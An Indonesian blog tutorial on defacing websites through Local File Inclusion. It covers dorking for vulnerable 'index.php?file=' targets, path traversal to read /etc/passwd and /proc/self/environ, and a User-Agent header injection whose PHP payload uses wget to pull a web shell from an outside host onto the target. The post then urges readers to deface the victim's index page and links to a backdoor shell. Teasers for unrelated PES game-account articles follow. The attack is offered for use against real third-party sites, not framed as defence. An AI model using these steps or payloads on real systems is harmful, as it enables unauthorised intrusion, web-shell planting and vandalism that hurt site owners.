Langsung ke konten utama

Tutorial deface menggunakan poc LFI

 



Hallo :)

Pada peluang kali ini saya bakal coba mengimplementasikan bagaimana caranya mengexploitasi terhadap website tujuan yang rentan terhadap serangan LFI atau mampu disebut termasuk bersama Local File Inclusion.


Oke tak usah berlalu-lama, kami langsung saja ya...


Hal yang pertama adalah mencari tujuan yang vulnerable terhadap serangan LFI. Kalian mampu memanfatkan search engine layaknya google, bing, atau yang lainya bersama dork, perumpamaan dorknya "index.php?file= site:com" selebihnya kembangin sendiri biar meraih yang terlalu vuln.


Tapi di sini saya sudah memiliki tujuan yang siap untuk dieksekusi, tapi saya tidak bakal saya sebutkan nama websitenya,  perumpamaan tujuan saya layaknya ini...


Jika kalian belum punya Shell backdoor dan script deface kalian bisa download dulu melalui link dibawah ini :


Shell backdoor : Klik Me 

Script deface : Klik Me


 

https://contoh.com/?file=college.php


Target sudah ada, kemudian coba ubah "college.php" bersama "../../../" perumpamaan lengkapnya bakal layaknya ini..

https://contoh.com/?file=../../../

Setelah saya klik enter, tapi di sini saya tidak meraih pesan error dengan sebutan lain hanya blank warna putih gitu. Entah ini vuln atau tidak saya termasuk agak begitu kurang paham.


Ok gamasalah, coba iseng-iseng menganti "../../../" bersama layaknya ini "/etc/passwd" perumpamaan layaknya ini...

https://contoh.com/?file=/etc/passwd

Tapi lagi-lagi di sini tidak meraih apa-apa, penampilan hanya menampkan blank warna putih, shit!



 

Mikir sebentar, kemudian di sini saya coba menaikan directorynya. Contoh layaknya ini..

https://contoh.com/?file=../etc/passwd > blank

https://contoh.com/?file=../../etc/passwd > lagi-lagi hanya blank

Tapi kemudian terhadap pas saya menaikan directorynya pas ke tiga, sepetti ini...

https://contoh.com/?file=../../../etc/passwd

Boom, saya berhasil membaca file etc/passwd wah mantap ini mah hhh...




Selanjutnya saya bakal coba mengecheck /proc/self/environ apakah mampu diakses atau tidak? Sekarang ubah "/etc/passwd" bersama "/proc/self/environ" selanjutnya jalankan..

https://contoh.com/?file=../../../proc/self/environ

Mantul mantap betul ternyata berhasil membaca filenya, layaknya ini...




Yeah, /proc/self/environ berhasil diakses. Tapi terkecuali kalian terhadap pas mau mengakses /proc/self/environ menampilkan halaman kosong (blank) atau tidak mampu diakses, atau barangkali itu beroperating system *BSD.


Sekarang seterusnya mari kami injeksi bersama malicious code bersama meracuni  terhadap bagian http headernya. Kalian mampu mengunakan addon tamper information mozilla firefox.

Caranya membuka tamper information di mozilla firefox kemudian selanjutnya masukan url /proc/self/environ yang tadi "https://contoh.com/?file=../../../proc/self/environ" selanjutnya terhadap bagian user-agent isikian code layaknya tersebut ini...


<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>


lalu klik submit.


Ok injeksi malicious code selesai, bila berhasil letak shellnya berada terhadap directory berikut...


https://contoh.com/shell.php 



Setelah Shell berhasil di akses terserah kalian mau diapain, saran mending deface saja jangan aneh-aneh kasian yang punya website:v kalau mau tebas index backup dulu ya, atau ganti saja file index.php saja.

Label

Label:

Komentar

Posting Komentar

Berkomentar dengan baik dan dilarang mencantumkan link aktif, jika ada komentar dengan link aktif akan admin nonaktifkan.

Postingan populer dari blog ini

Cara mengatasi Konami ID has been locked saat login Konami ID

  Halo sobat tamatekno , di artikel kali ini admin mau share tips atau tutorial mengatasi Konami ID has been locked. Konami ID has been locked biasa terjadi saat anda hendak login ke PES mobile menggunakan data transfer Konami ID, yang artinya akun Konami ID anda terkunci atau dikunci oleh Konami karena aktifitas yang mencurigakan. Ada beberapa hal yang menyebabkan akun Konami ID anda terkunci, dan berikut adalah beberapa hal yang menyebabkan akun Konami ID anda terkunci. Penyebab akun Konami ID has been locked Mungkin anda sudah tahu apa penyebabnya, namun jika anda belum tahu maka anda harus mengetahuinya terlebih dahulu. Anda dapat memahami beberapa hal yang menyebabkan akun Konami ID anda terkunci. - Terlalu sering memasukan password yang salah - Login di perangkat lain yang berbeda OS (misalnya android dan IOS) - Terlalu sering gagal login menggunakan Konami ID - Terlalu sering gonta-ganti akun menggunakan data transfer Konami ID - Akun terindikasi berbahaya oleh pihak Konam...
Posting Komentar
Baca selengkapnya

Update! Kumpulan akun PES 2021 mobile gratis terbaru

  Halo sobat tamatekno, di artikel ini ada yang spesial nih. Ya di artikel ini saya ingin berbagi beberapa akun PES 2021 mobil gratis kepada sobat tamatekno, karena kebetulan akun saya banyak yang tersimpan di email. Ada 20an lebih akun yang akan saya bagikan kepada sobat semua, daripada ngga dimainkan karena saya mau fokus kuliah dan ngeblog. Akun PES yang ingin saya bagikan bukan akun kaleng-kaleng yang sob, karena akun-akun saya merupakan akun old dan terdapat banyak ICONIC dan legend. Selain itu akun PES gratis yang ingin saya bagikan juga memiliki aset yang melimpah, khususnya GP dan trainer. Untuk koin undah saya pake buat roll ICONIC kemaren, wkwk. Nah buat sobat yang ingin mendapatkan akun PES gratis, sobat bisa mengambilnya dari beberapa akun di bawah ini. Akun-akunya sudah saya buatkan Konami ID semua yah, jadi ngga ada yang menggunakan Gmail atau google play. Dan sobat harus cepat mengamankan akunya jika sobat dapet, biar ngga di amankan oleh orang lain. Yang terakhir ...
8 komentar
Baca selengkapnya

Cara hapus data atau unlink akun google PES 2021 mobile

Halo sobat tamatekno, pada postingan kali ini admin mau update artikel tentang PES lagi. Artikel yang akan admin update adalah cara menghapus data akun google di PES mobile. Ini biasanya terjadi saat anda ingin menjual akun atau membeli akun tetapi akun PESnya terkait dengan akun google. Biasanya pembeli tidak mau membeli akun yang terkait dengan akun google, sama saat kita membeli akun PES pun tidak mau kalau akun PES nya terkait dengan akun PES mobile. Hal tersebut memiliki alasan tersendiri karena akun PES mobile yang terkait dengan akun google akan mudah di hack back. Jika anda menemukan akun yang terkait dengan akun google tanpa sepengetahuan anda, atau anda ingin menghapus data tautan (unbind) akun google dari akun PES anda dapat menggunakan tutorial di bawah ini. Cara undind akun google di PES 2021 mobile Sebelum melanjutkan pastikan akun PES anda sudah tersimpan atau sudah dikaitkan dengan akun Konami ID, untuk menghindari hal-hal yang tidak diinginkan. Catatan: Pada tutorial i...
Posting Komentar
Baca selengkapnya